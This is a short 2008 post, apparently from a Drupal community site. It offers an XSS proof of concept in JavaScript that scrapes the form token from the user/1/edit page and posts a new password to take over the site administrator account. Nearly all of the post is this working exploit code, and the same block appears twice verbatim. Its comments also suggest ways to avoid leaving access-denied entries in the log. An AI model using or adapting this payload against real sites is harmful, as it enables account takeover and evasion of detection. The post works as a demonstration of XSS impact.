Update UID 1 password via JS
Heine Mon, 2008/01/14 - 09:08
A simple proof of concept (without <script> tags) to reset to the Administrators' password via a cross site scripting attack (XSS). Did you think XSS was harmless?
// Test for the presence of jquery.
if (typeof jQuery == 'function') {
// Fetch a correct token from user/1/edit because we will need it to
// successfully submit the user edit form later.
// TODO: Include a check to increase the chance that the current user is admin,
// which will reduce the number of access denied error messages in the log.
jQuery.get('/user/1/edit',
function (data, status) {
if (status == 'success') {
// Extract the token.
var matches = data.match(/id="edit-user-edit-form-token" value="([a-z0-9]*)"/);
var token = matches[1];
// Post the minimum amount of fields. Other fields get their default values.
var payload = {
"form_id": 'user_edit',
"form_token": token,
"pass[pass1]": 'hacked',
"pass[pass2]": 'hacked'
};
jQuery.post('/user/1/edit', payload);
}
}
);
}
if (typeof jQuery == 'function') {
// Fetch a correct token from user/1/edit because we will need it to
// successfully submit the user edit form later.
// TODO: Include a check to increase the chance that the current user is admin,
// which will reduce the number of access denied error messages in the log.
jQuery.get('/user/1/edit',
function (data, status) {
if (status == 'success') {
// Extract the token.
var matches = data.match(/id="edit-user-edit-form-token" value="([a-z0-9]*)"/);
var token = matches[1];
// Post the minimum amount of fields. Other fields get their default values.
var payload = {
"form_id": 'user_edit',
"form_token": token,
"pass[pass1]": 'hacked',
"pass[pass2]": 'hacked'
};
jQuery.post('/user/1/edit', payload);
}
}
);
}